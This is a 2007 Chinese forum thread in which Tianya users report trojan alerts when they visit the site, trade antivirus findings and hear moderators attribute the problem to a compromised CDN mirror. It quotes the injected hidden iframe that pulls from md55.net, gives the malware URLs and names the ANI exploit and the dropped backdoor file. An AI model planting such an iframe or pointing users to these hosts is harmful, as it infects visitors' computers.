什么这两天我一上天涯社区就中毒！！！
　　一旦打开天涯社区以及每个相关网页，就会自动下载病毒
　　http://md55.net/soft7/ani.c
　　

作者：浪子文刀　回复日期：2007-9-2　10:11:21

　　待技术人员解答一下，我的经验是在别的网站中毒了，比较难处理 ：）

作者：佛客使　回复日期：2007-9-3　9:45:00

　　我开始还以为只有我的电脑会这样呢，上网搜了一上，不少人都有相同的情况。
　　
　　另外，暂时没有发现打开别的网站会出现这个恶意程序警告

作者：酒精稀释泪水　回复日期：2007-9-3　10:31:31

　　我的不会啊,我同意文刀的解释:)

作者：恋上鸩酒　回复日期：2007-9-3　11:39:21

　　我这两天一输入天涯网址，金山就提示有病毒。而且天涯的网页再也打不开。

作者：我来我征服　回复日期：2007-9-3　11:49:21

　　这两天天涯是被人挂了，我的nod32和麦咖都报警
　　昨天技术那边已经把木马取下来了，是今天凌晨又挂上的-_-||
　　

作者：阿黛儿she　回复日期：2007-9-3　12:16:30

　　我也是，一开天涯金山就说有木马，然后用毒霸可以在C盘杀到一个，开别的网页就不会有这种情况。

作者：生活在0898　回复日期：2007-9-3　15:22:49

　　开其他任何网页没有这样的现象，开天涯社区，海南一家就这样，打开社区，打开帖子很困难！金山一直报警！！！

作者：恋上鸩酒　回复日期：2007-9-3　16:47:38

　　为什么还没把病毒清理啊？天涯的技术人员在干嘛！
　　
　　Win32 OR Troj OR ExpAni

作者：陌生的另一张脸　回复日期：2007-9-3　17:21:50

　　和楼主说的一样！！！
　　这两天都这样，一直以为是其他的问题，没料到问题竟然出现在这里！害的我系统装了N次！
　　问题什么时候能解决啊！！！！！！！！！！！！！

作者：weileni1982　回复日期：2007-9-3　18:55:53

　　我的也一样，我要告天涯，．
　　他乃的的

作者：weileni1982　回复日期：2007-9-3　19:01:13

　　老　

作者：weileni1982　回复日期：2007-9-3　19:02:54

　　没有一个官方人员说个清楚，怎么回师

作者：青皮六　回复日期：2007-9-3　19:07:29

　　他娘的,我也中招,一登陆瑞星就报警,百度搜索了一下,原来如此.

作者：苑风　回复日期：2007-9-3　21:41:11

　　我的电脑也有问题,9.1关不了机,昨天只得送去重装,今天傍晚才拿回来,我没想到是天涯的问题,搞不好现在又中招了

作者：与狼共舞啊　回复日期：2007-9-3　21:58:53

　　从昨天就出现这个问题，卡巴跳出来说http://md55.net/soft7/wo.html这个网址有问题，我马上就把这个网址屏蔽了，并在浏览器的过滤里加入这个网址，卡巴不跳了但访问天涯的速度就很恼火，后来用IP地址直接访问天涯就很快，但太麻烦，每个帖子都要把IP复制上去，希望天涯的技术人员尽快解决这个问题。

作者：ifw　回复日期：2007-9-3　21:58:15

　　我办公室电脑一打开天涯，诺顿就报有文件ani[1].c病毒，其他网站都没问题。家里电脑没事，这是怎么回事。

作者：吕南一枝花　回复日期：2007-9-3　22:19:55

　　我根本上不去，打开都是一片空白。我说咋回事。

作者：haizhonggao　回复日期：2007-9-3　22:32:55

　　至目前--2007.09-03、10：33，此病毒还在，请速处理~！

作者：秋碧　回复日期：2007-9-3　22:38:17

　　莫名其妙的奇怪
　　http://md55.net/soft7/wo.html
　　这个网址就像幽灵一样...
　　是不是鬼节放出来,没有回去的...

作者：chillheart　回复日期：2007-9-4　8:37:51

　　NND,这种现像已经有三四天了，也没人解决一下，今天是冒着中毒的危险来这儿留言的。

作者：booby　回复日期：2007-9-4　9:28:21

　　麻烦楼上出现报警提示的网友用firefox浏览器测试一下，如果在firefox浏览器下没有报警，有可能是您的IE中毒，有可能是浏览器被嵌了某些插件等等。感谢您的配合及反馈。：）
　　天涯技术部一直在进行测试，用各种杀毒软件，暂没发现报警提示。

作者：gys01　回复日期：2007-9-4　9:54:37

　　我的也是报警，由于不能贴图，看看我的帖子http://bbs.deepin.org/read.php?tid=292086&page=e&

作者：灯暖风凉　回复日期：2007-9-4　10:20:21

　　我终于找到和我一样的了 我先还以为是我机器里中了病毒呢 ，，，一开天涯也是出来这个网站http://md55.net/soft7/wo.html 卡巴利马说带有木马。。回头我的天涯都已经三天上不来了。。。。我先以为是我中了木马 我用卡巴 用AVG都杀了一遍 都没找到 后来干脆GHOST了 结果一上天涯还是不行 其他的网站完全没问题 各位 到底有没有什么解决办法。。。

作者：kenshin777　回复日期：2007-9-4　10:22:48

　　一样

作者：gys01　回复日期：2007-9-4　10:34:28

　　用firefox浏览器测试一下一个样！期待中.......
　　

作者：少爷200　回复日期：2007-9-4　10:34:24

　　作者：booby　回复日期：2007-9-4　9:28:21　
　　　　麻烦楼上出现报警提示的网友用firefox浏览器测试一下，如果在firefox浏览器下没有报警，有可能是您的IE中毒，有可能是浏览器被嵌了某些插件等等。感谢您的配合及反馈。：）
　　　　天涯技术部一直在进行测试，用各种杀毒软件，暂没发现报警提示。
　　－－－－－－－－－－－－
　　如果是我们的IE中毒，那为什么别的网站不出问题，偏偏是天涯社区就下载http://md55.net/soft7/ani.c ！！！
　　

作者：封印着怀念　回复日期：2007-9-4　11:26:11

　　我的也是，刚开始我还以为是自己的电脑出问题了。不停的清空IE缓冲，但是一开天涯，不停的警告，就昨天晚上是好的。今天又不行了。

作者：flyineagle　回复日期：2007-9-4　12:32:17

　　各位电脑中毒鸟~~
　　

作者：flyineagle　回复日期：2007-9-4　12:37:47

　　天涯电信的某服务器被挂马了？？？？

作者：著名人士　回复日期：2007-9-4　14:26:08

　　怎么搞的，难道天涯的管理员都是不作事的啊

作者：米兰米饭　回复日期：2007-9-4　15:18:08

　　和楼主相同情况。。。上不了天涯。。。其他网站一切正常

作者：桃子中队长　回复日期：2007-9-4　15:27:12

　　安也素，一打开网页就说中毒了

作者：漠上驿　回复日期：2007-9-4　17:35:31

　　兄弟姐妹，老少爷们们，
　　啥也别说
　　我被害惨了，，
　　就差点没把所有杀毒软件试完了，
　　要是再重装我这机子也快报废了。。。。

作者：尼丹小　回复日期：2007-9-4　18:52:14

　　天涯就是公共汽车，黑客随便进出，木马随便挂，管理员ID随便盗，技术人员表嘴硬了。。。

作者：chanily　回复日期：2007-9-4　18:53:42

　　我的也这样啊,就打开天涯不行啊,其他的都可以

作者：gbnh　回复日期：2007-9-4　18:57:57

　　是啊，我也是，根本就上不来．
　　

作者：lcn01072000　回复日期：2007-9-4　19:26:03

　　天涯社区:请尽快解决恶意程序 Exploit.Win32.IMG-ANI.k URL: http://md55.net/soft7/ani.c类似问题吧。
　　

作者：leaderling　回复日期：2007-9-4　19:29:36

　　我也中了，快解决啊

作者：thissun　回复日期：2007-9-4　19:42:06

　　我也中了，快解决啊我也中了，快解决啊我也中了，快解决啊我也中了，快解决啊我也中了，快解决啊我也中了，快解决啊我也中了，快解决啊我也中了，快解决啊我也中了，快解决啊我也中了，快解决啊我也中了，快解决啊我也中了，快解决啊我也中了，快解决啊我也中了，快解决啊我也中了，快解决啊我也中了，快解决啊我也中了，快解决啊我也中了，快解决啊我也中了，快解决啊我也中了，快解决啊我也中了，快解决啊我也中了，快解决啊我也中了，快解决啊我也中了，快解决啊我也中了，快解决啊我也中了，快解决啊我也中了，快解决啊我也中了，快解决啊我也中了，快解决啊我也中了，快解决啊我也中了，快解决啊我也中了，快解决啊我也中了，快解决啊我也中了，快解决啊我也中了，快解决啊我也中了，快解决啊我也中了，快解决啊我也中了，快解决啊我也中了，快解决啊我也中了，快解决啊我也中了，快解决啊我也中了，快解决啊我也中了，快解决啊我也中了，快解决啊我也中了，快解决啊我也中了，快解决啊我也中了，快解决啊

作者：头疼不已　回复日期：2007-9-4　20:06:36

　　我靠，我还以为就我一个人这样呢，闹了半天这么多人都中招了啊，，，，
　　
　　怎么还解决不了啊，，，，

作者：最帅重庆仔　回复日期：2007-9-4　20:25:47

　　我的也是

作者：青梅回来　回复日期：2007-9-4　20:34:47

　　我也是啊，其他网站都没问题，就天涯不行，一打开就指向md55那个破东西，然后一片白茫茫

作者：手爪子贱　回复日期：2007-9-4　21:15:44

　　我的情况和大家一样,已经联系天涯工作人员,可他们说我的浏览器有问题~不可能大家的浏览器都有问题吧~请天涯工作人员回复,大家很关注的~

作者：手爪子贱　回复日期：2007-9-4　21:27:06

　　我使用遨游最新版本,全新系统,全新补丁,瑞星全新升级,一进天涯就中毒!现在瑞星和遨游中设置屏蔽http://md55.net和IP:61.153.153.231 (两者为同一个地址)虽然没报毒,但浏览器进http://www.tianya.cn/时候明显看到先链接到http://md55.net或61.153.153.231.再等几分钟白茫茫页面后才可打开正常页面!难道只对IE核心的浏览器起作用?!firefox没事?!
　　望工作人员再测试,顺便麻烦报网警关闭这可恶的地址!

作者：justTit　回复日期：2007-9-4　21:27:47

　　我也中了相同的招。
　　请工作人员好好看看。用IE，单单就是tianya的不行，而开其它网页很正常。

作者：文斟　回复日期：2007-9-4　21:37:23

　　我的也是啊，还以为只有我一个人有这种情况呢，本来每天必会上天涯看看的，可是现在根本进不来了，老是提醒有木马！麻烦解决下吧

作者：蟄茯　回复日期：2007-9-4　21:37:45

　　同上面各位一样
　　痛苦ING.........

作者：haizhonggao　回复日期：2007-9-4　21:59:47

　　天涯没有高手么？ 怎么容许这个病毒存在这么久？？？

作者：justTit　回复日期：2007-9-4　22:06:19

　　<iframe src=http://md55.net/soft7/wo.htm width=20 height=0 frameborder=0></iframe> <html>
　　<head>
　　<title>欢迎来到天涯虚拟社区</title>
　　<meta http-equiv="Content-Type" content="text/html; cha(以后省略)
　　－－－－－－－－－－－－－－－－－－－－－－－－
　　刚看了下源文件给多了<iframe src=http://md55.net/soft7/wo.htm width=20 height=0 frameborder=0></iframe> 这样一个东东....
　　.......是自己的IE问题还是tianya给人挂了木马...有高手能回答么？

作者：手爪子贱　回复日期：2007-9-4　22:13:11

　　用firefox的确不会连接到http://md55.net或61.153.153.231。但我使用遨游进新浪没问题，奇怪的问题。
　　1.IE核心浏览器有问题。
　　2.天涯是http://md55.net或61.153.153.231攻击对象。
　　我一直以为是个例，结果这么多朋友同时反映说明问题所在，请工作人员仔细帮助我们查询下原因。
　　请按照我们的使用环境测试，例如我们的系统都是D版，ADSL，遨游，瑞星，金山……

作者：想你以久　回复日期：2007-9-4　22:13:43

　　啊 我的也是 一上天涯有关的风页 瑞星就报有毒 在临时文件夹里

作者：justTit　回复日期：2007-9-4　22:11:41

　　哦，在啰唆一句哈，
　　我又用firefox，能够打开天涯，但是看源文件依然能发现同样有<iframe src=http://md55.net/soft7/wo.htm width=20 height=0 frameborder=0></iframe>这样一串东西.....
　　十分好奇到底发生了什么事情...我只是好奇。。好奇害死猫。。

作者：手爪子贱　回复日期：2007-9-4　23:08:09

　　firefox也中镖？！只是暂时可屏蔽？！
　　冒死打开该网页，指向站长统计，指向站长之家。
　　受不了这个破毒了！问候制作这个网页病毒的人全家！
　　天涯帮偶们~
　　
　　

作者：韩江水东流　回复日期：2007-9-4　23:15:10

　　TO:作者：booby
　　天涯有您，悲哀
　　
　　我从9月1日发现有这么一回事，然后尝试杀毒，结果没发现病毒
　　看来江民还过得去
　　其他网站都没有问题，独独上天涯就这样
　　难道天底下真有这么巧的事情
　　
　　

作者：蓝风调调　回复日期：2007-9-4　23:17:48

　　是啊!!!!!!!!!!!!!真急人啊!!!!!!!!!!!!!!!我都搞了两天了!!!!!!!!!!就上不了天涯啊!!!!!!!!!恢复系统N多次,下载系统补钉N多个,都不行啊!!高手快来指点一下啊!!!!!

作者：韩江水东流　回复日期：2007-9-4　23:27:18

　　作者：韩江水东流　回复日期：2007-9-2　12:23:32　
　　　　奶奶的，天涯是不是中毒了。输入www.tiany.cn的网址，江民杀毒总是提示在打开http://md55.net...中有病毒，病毒名exploit.anifile.b ，从前晚就是，一直到现在。是不是被挂木马了，天涯的主页总是会尝试打开md55.net这个网站。
　　　　
　　　　现在只能通过镜像
　　　　http://1home.hainan.net/index.asp?idwriter=0&key=0&vitem=water 才能打开页面。其他网站没问题，经过多次杀毒，暂时确认电脑没问题。
　　　　
　　　　那个鸟客服电话，打了两天都没人接；奶奶的。
　　

作者：justTit　回复日期：2007-9-4　23:30:40

　　利用楼上的那个镜像打开页面看源代码，就没有那个可疑代码。。
　　这又说明了一个怎样的问题？？！！！

作者：BWAY　回复日期：2007-9-5　0:28:29

　　丁军门：一定要追查！
　　
　　似乎铁通用户抱怨最多的。

作者：BWAY　回复日期：2007-9-5　0:32:09

　　打开每个版块、打开每个帖子都会警报叫，都是那个破病毒/网虫，
　　
　　文件名：http://md55.net/soft7/ani.c
　　　　恶意软件名称：CVE-2007-0035
　　　　VPS版本：000772-2,2007-09-04
　　
　　
　　为什么去别的网站去都没提示有问题呢？？？

作者：蓝风调调　回复日期：2007-9-5　0:33:35

　　谁是丁军门呀?
　　
　　是啊,我们也是铁通的啊!还是局域网的!
　　
　　坚决支持,严厉打击!!!!!!!!!!!!
　　坚决支持,严厉打击!!!!!!!!!!!!
　　坚决支持,严厉打击!!!!!!!!!!!!
　　坚决支持,严厉打击!!!!!!!!!!!!
　　坚决支持,严厉打击!!!!!!!!!!!!
　　坚决支持,严厉打击!!!!!!!!!!!!
　　坚决支持,严厉打击!!!!!!!!!!!!
　　坚决支持,严厉打击!!!!!!!!!!!!
　　坚决支持,严厉打击!!!!!!!!!!!!
　　坚决支持,严厉打击!!!!!!!!!!!!
　　坚决支持,严厉打击!!!!!!!!!!!!
　　

作者：二机部　回复日期：2007-9-5　0:41:26

　　是不是网络商推出针对性的广告?

作者：taodei　回复日期：2007-9-5　0:42:01

　　
　　我的也是，输入天涯瑞星就报警。打不开天涯，投诉都没门！
　　最后上百度输入"天涯 病毒"才链到这个帖子里。
　　
　　天涯的技术员，好几天啦，你们好意思吗，还有脸见人吗？

作者：BWAY　回复日期：2007-9-5　1:29:19

　　作者：蓝风调调　回复日期：2007-9-5　0:33:35　
　　　　谁是丁军门呀?
　　　　
　　　　是啊,我们也是铁通的啊!还是局域网的!
　　　　
　　　　坚决支持,严厉打击!!!!!!!!!!!!
　　-----------------------------
　　丁军门是邓世昌的领导啊~~
　　你不会问我谁是邓世昌的吧？？

作者：头疼不已　回复日期：2007-9-5　9:06:13

　　我也是铁通，在单位是网通就没事，难道只有铁通的才会中招？？？？？？？

作者：浪子文刀　回复日期：2007-9-5　9:18:56

　　经初步调查，是由于CDN服务器中毒导致的。CDN是服务提供商为天涯做的一个镜像，目的在于改善非电信用户访问天涯的速度。现在初步调查的结果是CDN服务提供商的镜像服务器中毒，在天涯的镜像上挂马，导致非电信用户上天涯时中毒。
　　
　　以上为初步调查结果，待技术部门继续深入。
　　

作者：clearglance　回复日期：2007-9-5　9:25:51

　　知道自己有问题就好
　　希望bobby版主能够引以为戒
　　增加最起码的安全意识以及软件常识
　　不要一口咬定是用户的责任
　　虽然不拿工资 但还是要增强一点服务意识与企业形象意识
　　bobby版主让我很失望
　　

作者：clearglance　回复日期：2007-9-5　9:29:40

　　因为bobby版主的失职 让病毒没有及时处理 使相当一部分的用户计算机受损
　　因此我建议撤销bobby版主的职务

作者：浪子文刀　回复日期：2007-9-5　9:39:55

　　此事与BOOBY无关，请不要责怪她 ：）

作者：陈飒　回复日期：2007-9-5　10:10:40

　　中毒的人你们用的是什么线路啊？网通？电信？铁通？
　　
　　大家回馈一下，帮助技术员查找原因吧。
　　
　　天涯的服务器没有问题。初步了解是中间环节有问题。
　　
　　我这里确实没有检测到木马的存在。还请大家理解。

作者：韩江水东流　回复日期：2007-9-5　10:17:39

　　是和她没什么关系，只是说话不爱经大脑而已
　　今天好像，好像还没报警；难道是搞定了
　　我的是移动的edge
　　
　　

作者：QL1000　回复日期：2007-9-5　10:22:39

　　俺用的是铁通,昨天还上不了

作者：QL1000　回复日期：2007-9-5　10:23:50

　　3个木马,今天咋不出来了

作者：gys01　回复日期：2007-9-5　10:46:00

　　铁通，现在好像没有了

作者：逆流狼人　回复日期：2007-9-5　10:57:51

　　最近遇到一件很郁闷的事 ，天涯 我上不去了一访问天涯就提示 网页被转到 http://md55.net/soft7/wwb.htm 上面去了 然后就直接 在上面下载一个ani的病毒 做了恶意网站屏蔽 天涯也上不去了 后无奈又装了风云防火墙 也无济于事，最后经过一番苦战，终于找到病毒源 C:\WINDOWS\Finish.exe 呵呵 原来是它啊 搞的大家很郁闷的东东铲除后 一切OK！
　　
　　另：卡巴斯基可以清楚此病毒
　　
　　已删除: 木马程序 Backdoor.Win32.Delf.apx 文件: C:\WINDOWS\Finish.exe//PE_Patch.UltraProtect//UltraProtect
　　
　　中国撞客联盟原创：www.drunkard.cn
　　
　　
　　希望由此症状的朋友能得以借鉴
　　

作者：justTit　回复日期：2007-9-5　11:25:02

　　我用的是移动的光E空间，不过好像最终我们是走的网通的线路。

作者：酒精稀释泪水　回复日期：2007-9-5　12:39:48

　　电信一直没有问题

作者：手爪子贱　回复日期：2007-9-5　13:09:55

　　第一次中这么厉害的毒，在过去3天安装系统的次数要比3年安装次数都多。每次全新安装全新补丁后登陆天涯就杀出毒。说明问题不在用户方，但我9.2给天涯邮件联系反映该问题，回复大意说我浏览器有问题。要是技术部早日根据我描述，这次中毒范围也不会波及这么大！
　　谢谢浪子文刀陈飒的及时回复，知道原因，我终于塌实许多！
　　有关booby的回复，哎，不说也罢。
　　我是铁通，今天中午登陆一切正常，直接连接进来，速度很快！
　　我认为天涯最好正面说明下这次被攻击事件。这样心胸才显大，才显天涯气魄！　

作者：蟄茯　回复日期：2007-9-5　13:48:43

　　铁通~悲哀....

作者：浪子文刀　回复日期：2007-9-5　13:59:03

　　解决就好 ：）